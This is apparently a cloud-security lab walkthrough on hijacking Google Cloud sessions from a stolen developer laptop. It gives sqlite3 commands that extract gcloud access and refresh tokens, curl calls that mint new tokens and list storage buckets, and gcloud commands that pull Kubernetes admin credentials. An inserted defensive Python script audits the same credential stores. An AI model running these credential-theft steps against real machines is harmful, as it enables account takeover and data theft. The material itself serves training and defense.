# Stealing API Keys and Service Account Tokens

## Introduction

OAuth is used for all Google authentication: user accounts and service accounts, browser and SDK clients, as well as internal Compute Engine VMs. The resulting session tokens give an attacker the opportunity to hijack and reuse authenticated sessions.

## What are we going to cover

We will cover how session tokens on a Google Cloud admin's client machine can be hijacked to gain access to that user's Google Cloud environments. The scenario is a stolen developer laptop.

`gcloud` stores credentials and tokens in the `~/.config/gcloud` folder as SQLite databases. We will perform some simple analysis of the credentials and token files and examine what can be abused.

## Steps to attack

* Change to the `~/.config/gcloud` directory on the student machine.
* Identify the currently logged-in gcloud email with `gcloud auth list`.
* Run the `sqlite3` command below to extract the access token for the current Google Cloud user:

```
sqlite3 access_tokens.db "select access_token from access_tokens where account_id='{your-account-id}';"
```

![](/files/UD8W9MAbfwfsgmlqdJqn)

* `credentials.db` holds a whole lot of information about the current Google Cloud user account, including the OAuth scopes and a refresh token. You can view it with the command below:

```
sqlite3 credentials.db "select value from credentials where account_id='{your-account-id}';"
```

![](/files/NNX41s2jR0xJYDXwAgHt)

* Using this information we can now request a fresh access token, which can then be used to make API calls to other Google Cloud resources:

```
curl -s --data client_id=<your-client-id> --data client_secret=<your-client-secret> --data grant_type=refresh_token --data refresh_token=<your-refresh-token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```

![](/files/ANzzqYPdmsJkFOOxX8hz)

* Let's make API calls to list the buckets in a project and then the objects in one bucket. Use the `curl` commands below:

```
curl -s -H "Authorization: Bearer <token-generated-from-previous-step>" https://storage.googleapis.com/storage/v1/b?project=<project-name>
```

![](/files/aL5evXzEE5d7oJJd0LeL)

```
curl -s -H "Authorization: Bearer <token-generated-from-previous-step>" https://storage.googleapis.com/storage/v1/b/<bucket-name>/o?project=<project-name>
```

![](/files/YxKvUa6Z0qyNjFb54Tvc)
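As an added defender's check (not part of this page, nor gcloud's own code): the audit below reads the same `credentials.db` and `access_tokens.db` stores the steps above query, but reports only whether each account holds a refresh token, whether its scopes include `cloud-platform`, whether a cached access token is still valid, and whether the files are readable by other local users, so an admin knows what to revoke after a laptop is lost. The table layouts, the `token_expiry` column and its timestamp format, and every sample value are assumptions; `make_sample_config` builds constructed databases so the script runs offline.

```python
import json, os, sqlite3, stat, tempfile
from datetime import datetime, timedelta, timezone

CLOUD_PLATFORM = "https://www.googleapis.com/auth/cloud-platform"

def audit_gcloud_config(config_dir):
    """Summarise what a gcloud config dir exposes per account; secret values are never returned."""
    cred_db, tok_db = (os.path.join(config_dir, n) for n in ("credentials.db", "access_tokens.db"))
    # A store readable by group/others is exposed to every local user, not only the owner.
    lax = [os.path.basename(p) for p in (cred_db, tok_db)
           if os.path.exists(p) and stat.S_IMODE(os.stat(p).st_mode) & 0o077]
    report = {}
    if os.path.exists(cred_db):
        con = sqlite3.connect(cred_db)
        for account, value in con.execute("select account_id, value from credentials").fetchall():
            cred = json.loads(value)
            scoped = CLOUD_PLATFORM in cred.get("scopes", [])
            # A refresh token with cloud-platform scope outlives every access token: revoke it if the device is lost.
            report[account] = {"type": cred.get("type"), "refresh_token": bool(cred.get("refresh_token")),
                               "cloud_platform_scope": scoped, "access_token_live": False,
                               "revoke": scoped and bool(cred.get("refresh_token"))}
        con.close()
    if os.path.exists(tok_db):
        con = sqlite3.connect(tok_db)
        # The token_expiry column and its "YYYY-MM-DD HH:MM:SS" UTC format are assumed (not shown on the page).
        for account, expiry in con.execute("select account_id, token_expiry from access_tokens").fetchall():
            if account in report:
                exp = datetime.fromisoformat(expiry).replace(tzinfo=timezone.utc)
                report[account]["access_token_live"] = exp > datetime.now(timezone.utc)
        con.close()
    return {"lax_permissions": lax, "accounts": report}

def make_sample_config(config_dir=None):
    """Construct a gcloud-style config dir with placeholder values (table layouts assumed from the page's queries)."""
    config_dir = config_dir or tempfile.mkdtemp()
    con = sqlite3.connect(os.path.join(config_dir, "credentials.db"))
    con.execute("create table credentials (account_id text primary key, value blob)")
    con.execute("insert into credentials values (?, ?)", ("dev@example.com", json.dumps(
        {"type": "authorized_user", "client_id": "PLACEHOLDER", "client_secret": "PLACEHOLDER",
         "refresh_token": "PLACEHOLDER-refresh-token",
         "scopes": [CLOUD_PLATFORM, "https://www.googleapis.com/auth/accounts.reauth"]})))
    con.commit(); con.close()
    con = sqlite3.connect(os.path.join(config_dir, "access_tokens.db"))
    con.execute("create table access_tokens (account_id text primary key, access_token text, token_expiry text)")
    expiry = (datetime.now(timezone.utc) + timedelta(minutes=30)).strftime("%Y-%m-%d %H:%M:%S")
    con.execute("insert into access_tokens values (?, ?, ?)", ("dev@example.com", "PLACEHOLDER-access-token", expiry))
    con.commit(); con.close()
    os.chmod(os.path.join(config_dir, "credentials.db"), 0o644)  # deliberately lax for the demonstration
    return config_dir
```

On a real workstation call `audit_gcloud_config(os.path.expanduser("~/.config/gcloud"))`; accounts flagged `revoke` can be invalidated with `gcloud auth revoke <account>`.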

## Bonus attack (Discussion)

Also, if the developer had a Kubernetes cluster deployed, we could have downloaded the cluster admin credentials and gained access:

```
gcloud container clusters list --access-token-file=token.txt --project=k8testing-354609
```

![list cluster name](/files/bn0DwW0c0oeZsusrzNDA)

* Now we generate the kubeconfig:

```
gcloud container clusters get-credentials k8stest-cluster-1 --access-token-file=token.txt --project=k8testing-354609 --region=us-central1-c
```

![](/files/QxEWGhhmaWrTrNeuJdj0)

## Additional references

No additional references here

